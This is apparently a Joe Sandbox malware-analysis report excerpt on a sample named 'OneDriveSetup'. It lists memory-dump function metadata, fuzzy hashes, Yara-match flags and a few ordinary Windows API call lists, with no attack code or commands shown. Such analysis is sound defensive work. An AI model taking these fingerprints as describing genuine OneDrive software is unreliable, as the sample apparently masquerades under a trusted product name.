                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b656d6897a09d79abf03a270c137141d6f49ecad6dbd5cbb5bb3320d94b38e71
                                                                                                                                                                        • Instruction ID: 51ad5e944359f795798eaf1fb9787dfc462b83721ff7fd338efc84b20cf025b4
                                                                                                                                                                        • Opcode Fuzzy Hash: b656d6897a09d79abf03a270c137141d6f49ecad6dbd5cbb5bb3320d94b38e71
                                                                                                                                                                        • Instruction Fuzzy Hash: 1AC1A178E01218CFDB14DFA5C994B9DBBB2BF88301F6081A9D809A7395DB359E81CF11
                                                                                                                                                                        Function 0C41DE30 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 562d73ed61f8a8634dd27c0b9b84513dac45641bc01f455c2e5391ece6846531
                                                                                                                                                                        • Instruction ID: 933b9f58479eeb61f0b6828f0a80557ae751037f05b6ca8d551650f6acb1f044
                                                                                                                                                                        • Opcode Fuzzy Hash: 562d73ed61f8a8634dd27c0b9b84513dac45641bc01f455c2e5391ece6846531
                                                                                                                                                                        • Instruction Fuzzy Hash: BFC1D378E01218CFDB14DFA5C984B9DBBB2BF88300F5081AAD809AB355DB359E85CF51
                                                                                                                                                                        Function 0C412DDA Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 261fa9385846521c32990ccf556e107246b4919e0abfedfe48630e872529306b
                                                                                                                                                                        • Instruction ID: abf45d26988a69071a80c9c3f7ac40a4cc3daa7c5adb975e1e4094e04f4f88a7
                                                                                                                                                                        • Opcode Fuzzy Hash: 261fa9385846521c32990ccf556e107246b4919e0abfedfe48630e872529306b
                                                                                                                                                                        • Instruction Fuzzy Hash: 34A1F574E00208CFEB24DFA9C944B9DBBB1FF88301F20826AE449A7395DB759985CF55
                                                                                                                                                                        Function 0C412DE8 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ec3f604a70e8c0e031f0ac8746a63c95c84e456c8f680e6cc30ca1550c905cc7
                                                                                                                                                                        • Instruction ID: 46ebe324fcf8fe51cb54066014c79ba15b0bb90512a7877ee3a23434d6a34e06
                                                                                                                                                                        • Opcode Fuzzy Hash: ec3f604a70e8c0e031f0ac8746a63c95c84e456c8f680e6cc30ca1550c905cc7
                                                                                                                                                                        • Instruction Fuzzy Hash: C3A1F470E00208CFEB24DFA9C944B9DBBB1FF89305F20826AE449A7391DB759985CF55
                                                                                                                                                                        Function 0C411E98 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a9f20416e94766f5914e28df7eb2937242852675454516de81891ef74a3f9701
                                                                                                                                                                        • Instruction ID: 82cb75f7098504d934495444c650ce250c76bc0b6b77ba3d4c67c12d61431b38
                                                                                                                                                                        • Opcode Fuzzy Hash: a9f20416e94766f5914e28df7eb2937242852675454516de81891ef74a3f9701
                                                                                                                                                                        • Instruction Fuzzy Hash: 50A1B674E01218CFEB64CF6AD944B9DBBF2BF89300F14C1AAD448A7254DB745A85CF11
                                                                                                                                                                        Function 0C4117B0 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6788aa4291f3580092f9ccb1ec07d43078f07a3ba9081ab41dd5281eb141b148
                                                                                                                                                                        • Instruction ID: 6066fad45766a706765fd6d3a4ab355e64a5ca2db2f74e9392da6945c6baf13e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6788aa4291f3580092f9ccb1ec07d43078f07a3ba9081ab41dd5281eb141b148
                                                                                                                                                                        • Instruction Fuzzy Hash: 79A1A575E01218CFEB64CF6AD944B9EBBF2BF88300F14C1AAD948A7250D7745A85CF11
                                                                                                                                                                        Function 0851D20A Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3882c5373837b3df8810ba3acc86a7f77d374127cac9700f52e2d60cc8bbfc06
                                                                                                                                                                        • Instruction ID: 589a81dd60610dfa499d247b71bf80d96e8d16ff936e5054361d1f197d39c1ba
                                                                                                                                                                        • Opcode Fuzzy Hash: 3882c5373837b3df8810ba3acc86a7f77d374127cac9700f52e2d60cc8bbfc06
                                                                                                                                                                        • Instruction Fuzzy Hash: 5591E274E00258CFEF54DFAAC884A9DBBF2BF89311F148069D819AB365DB709946CF11
                                                                                                                                                                        Function 0C413134 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7e943bb5897246b1ecb6daf6c4a26402e330392ca91986c47edb4a1ef9c166b8
                                                                                                                                                                        • Instruction ID: 4ee6b3866895c1046b3782a6396a5d26a72a1360176624b020814fe9e2db9a69
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e943bb5897246b1ecb6daf6c4a26402e330392ca91986c47edb4a1ef9c166b8
                                                                                                                                                                        • Instruction Fuzzy Hash: BF91E574E00218CFEB10DFA8D944B9DBBB1FF89311F20825AE849A73A1DB759985CF54
                                                                                                                                                                        Function 0851586F Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8c3ac654e6470668da8ff79903740991671fe96637303ddc2e3898b52fb00c50
                                                                                                                                                                        • Instruction ID: 68534ff3cabe35ff52cb6588d28ba560b3e2cb925c95f1e104558705afe32c3a
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3ac654e6470668da8ff79903740991671fe96637303ddc2e3898b52fb00c50
                                                                                                                                                                        • Instruction Fuzzy Hash: FF91C274E00208CFEB14DFA9D984A9DBBF2FF88311F14806AD819AB365EB305945CF51
                                                                                                                                                                        Function 0851C980 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 94c394ac844bea7cc96ce43806bbac6851adea82633419a86789669ebe322538
                                                                                                                                                                        • Instruction ID: 5ae292325fff291c77fc0f2f12b8b0a77f9fa6821d73475ab718feae25fb34f8
                                                                                                                                                                        • Opcode Fuzzy Hash: 94c394ac844bea7cc96ce43806bbac6851adea82633419a86789669ebe322538
                                                                                                                                                                        • Instruction Fuzzy Hash: FB81B174E40218CFEB14DFAAC884A9DBBF2FF88311F148069D419AB365DB355945CF51
                                                                                                                                                                        Function 0851CC58 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d2e6516dd32e06ba4b1f0c219b8822bb794a8fb5a060a056c709f0d61203ead8
                                                                                                                                                                        • Instruction ID: 97b5b39474ba7a1a7fdc753b0ca6cc200c1e904151b33704e9951c9132b48cd3
                                                                                                                                                                        • Opcode Fuzzy Hash: d2e6516dd32e06ba4b1f0c219b8822bb794a8fb5a060a056c709f0d61203ead8
                                                                                                                                                                        • Instruction Fuzzy Hash: C681B074E00218CFEB14DFAAD984A9DBBF2BF88301F14806AD819AB365DB319C45CF50
                                                                                                                                                                        Function 0851CF30 Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4d427ed08b5be4c49e975a510ebbc898b6cffb2bfc32b0321d9653b32b51ddd3
                                                                                                                                                                        • Instruction ID: d07f7071ada103dd09b01982cb0c5ac6506d48e2803c71b26c2f4198a36e6a05
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d427ed08b5be4c49e975a510ebbc898b6cffb2bfc32b0321d9653b32b51ddd3
                                                                                                                                                                        • Instruction Fuzzy Hash: C6819274E00218DFEB14DFAAD984A9DBBF2BF88311F148069D819AB365DB349946CF50
                                                                                                                                                                        Function 0851D4EA Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5f9d40404f89b637944c56c24db16599560d6fd3d0d4b88171c6d6236b10a944
                                                                                                                                                                        • Instruction ID: 726f9c5f6ebe88c7b1c6ed8d511f1b2d282df33976b8891e13f518ca91a996b8
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f9d40404f89b637944c56c24db16599560d6fd3d0d4b88171c6d6236b10a944
                                                                                                                                                                        • Instruction Fuzzy Hash: F881A174E00218CFEF18DFAAD984A9DBBF2BF88311F548069E819AB365DB345945CF10
                                                                                                                                                                        Function 0C410B20 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: db8492cfde5a61c12376785f340eac500be07514072dc083bb281d9145eb1fde
                                                                                                                                                                        • Instruction ID: 99b816389acdd00b166bc354d20f5b0b73af9dbc0ab73c209ca4f1c43b0c4d87
                                                                                                                                                                        • Opcode Fuzzy Hash: db8492cfde5a61c12376785f340eac500be07514072dc083bb281d9145eb1fde
                                                                                                                                                                        • Instruction Fuzzy Hash: AF71B675E01218CFDB64CF66D984BDDBBB2BF89301F1491AAD808A7354D7355A82CF41
                                                                                                                                                                        Function 0C41179F Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 20f0dee3298123cf47cf38313159038ab979ef786be2d30b82a764299cf9cf49
                                                                                                                                                                        • Instruction ID: 191354a747dd47e5d770f14251dccf33bf3770d7256bfd5e8d9b69bb512be1c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 20f0dee3298123cf47cf38313159038ab979ef786be2d30b82a764299cf9cf49
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D81A675E01618CFEB68CF6AC944B9EBBF2BF88300F14C1AAD548A7254DB744A85CF11
                                                                                                                                                                        Function 0851C6A8 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d953a29846bb1178e4bc523d5cec288e137c74ef3d9648dafdd951cc03db97f6
                                                                                                                                                                        • Instruction ID: df349e9e783ece75b67f883e96fd911513b88181cea181bff5bda4b8ded72bec
                                                                                                                                                                        • Opcode Fuzzy Hash: d953a29846bb1178e4bc523d5cec288e137c74ef3d9648dafdd951cc03db97f6
                                                                                                                                                                        • Instruction Fuzzy Hash: FC61B274E002489FEF18DFAAD984A9DBBF2BF88301F149069D419AB365EB355846CF11
                                                                                                                                                                        Function 0851EED0 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 007ab2703b158db44fb12010473d4fa829dcbd4794f0b2272024dd7bc4fbfcf1
                                                                                                                                                                        • Instruction ID: b7f9da3f3ef7dc4e709698612fa2651706c2cfe1be56f690aeedc0eecff19e43
                                                                                                                                                                        • Opcode Fuzzy Hash: 007ab2703b158db44fb12010473d4fa829dcbd4794f0b2272024dd7bc4fbfcf1
                                                                                                                                                                        • Instruction Fuzzy Hash: 5B51C774E00208DFEB18DFAAD494A9DFBB2FF89701F208069E815AB365DB315842DF51
                                                                                                                                                                        Function 0851EEE0 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 39009e2f54514dede99cc1a2fb1082f2adf2039a1cbc68cdb4205822f8013fb5
                                                                                                                                                                        • Instruction ID: 0fc2de50c1c01df2b0b6a846d4a9578eab0db434b349f7b5e781584d8924597a
                                                                                                                                                                        • Opcode Fuzzy Hash: 39009e2f54514dede99cc1a2fb1082f2adf2039a1cbc68cdb4205822f8013fb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 30519474E00308DFEB18DFAAD894A9DFBB2BF89701F209029E815AB365DB315841DF51
                                                                                                                                                                        Function 0C411E8A Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2ccc80f295ccb91fc8de8eec1c235a0af4fb00b390604e4e5cfde19a80541392
                                                                                                                                                                        • Instruction ID: 3e5318b89b4971f710cd8ff43a3a17379f600e683c7f89d4eb43b85a4e5dafa2
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ccc80f295ccb91fc8de8eec1c235a0af4fb00b390604e4e5cfde19a80541392
                                                                                                                                                                        • Instruction Fuzzy Hash: F1417AB1E016198BEB68CF5BDD4479EFAF3AFC9200F14C1AAC50CA6254DB750A868F51
                                                                                                                                                                        Function 0C41D9C8 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7b191bc43baccd566a20cd16f57b5521f86187376dbfefa6aca949f7c5ab19c5
                                                                                                                                                                        • Instruction ID: 32df3ae30a5cfacd1f691e06e562439e2fd3963163672d1014c073228bed2375
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b191bc43baccd566a20cd16f57b5521f86187376dbfefa6aca949f7c5ab19c5
                                                                                                                                                                        • Instruction Fuzzy Hash: E741D8B4E01248CBDB18DFAAC5506DEBBF2BF89300F64D12AC815BB254DB344946CF54
                                                                                                                                                                        Function 0C41DE1F Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4339c688fa319d8780f60fe842501c63b57af2bc77dec30cc435fce48c1b493a
                                                                                                                                                                        • Instruction ID: db34aaa2ce204662becfc9f74fa50234ad940c5a84b3f8b9ca811f0e6878667c
                                                                                                                                                                        • Opcode Fuzzy Hash: 4339c688fa319d8780f60fe842501c63b57af2bc77dec30cc435fce48c1b493a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E41B475E01248CBDB18DFA6D954B9DBBB2BF89300F60812AC819BB254DB355946CF50
                                                                                                                                                                        Function 0C412572 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 38fcc5a529943a319f77e5ab9aa661dd9ca630bb5fafc7fa00723448f19c2eeb
                                                                                                                                                                        • Instruction ID: 08a44b4fd96a8c1e689962a52a52cde643e7becf7bd322220bd28152e3310d2f
                                                                                                                                                                        • Opcode Fuzzy Hash: 38fcc5a529943a319f77e5ab9aa661dd9ca630bb5fafc7fa00723448f19c2eeb
                                                                                                                                                                        • Instruction Fuzzy Hash: ED41C574E01248CBDB18CFAAD554A9EBBF2BF89300F24C12AD819BB354DB355946CF50
                                                                                                                                                                        Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 165 401991 call 401030 164->165 165->162
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3322701435-0
                                                                                                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                        Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1411284514-0
                                                                                                                                                                        • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                        Function 08511190 Relevance: 1.8, Strings: 1, Instructions: 546COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
